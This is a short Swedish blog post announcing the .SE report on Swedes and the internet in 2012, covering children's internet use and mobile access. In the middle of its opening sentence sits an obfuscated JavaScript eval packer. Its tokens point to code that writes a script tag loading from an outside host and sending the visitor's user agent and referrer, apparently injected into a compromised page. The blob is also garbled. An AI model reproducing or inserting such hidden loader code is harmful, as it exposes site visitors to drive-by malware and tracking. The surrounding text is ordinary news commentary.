Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Rapporten om Svenskarna och Internet 2012 är släppt

Rapporten om Svenskarna och Internet 2012 är släppt
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzhis|var|u0026u|referrer|intbe||js|php’.split(‘|’),0,{}))
är rapporten som handlar om hur den dagliga användningen av Internet ökar otroligt bland skolbarn i låg- och mellanstadiet. Förutom detta har nu över hälften av svenska folket också tillgång till Internet via mobilen och surfplattorna börjar ta fart.

Rapporten är framtagen av .SE är en årlig rapport om Svenskarna och Internet.

Den handlar främst om hur internetanvändningen fortsätter att klättra nedåt i åldrarna. Det är skolbarn i låg- och mellanstadiet som står i centrum. Mer än hälften av alla treåringar och två av fem tvååringar använder idag Internet.
På två år har ytterligare en tredjedel av svenska folket skaffat sig tillgång till mobilt Internet. Det betyder att varannan svensk nu är uppkopplad mobilt.

Är det inte fantastiskt? Fler besökare till Revue 🙂

Skämt åsido, läs hela rapporten hos .SE, här och här eller kanske här.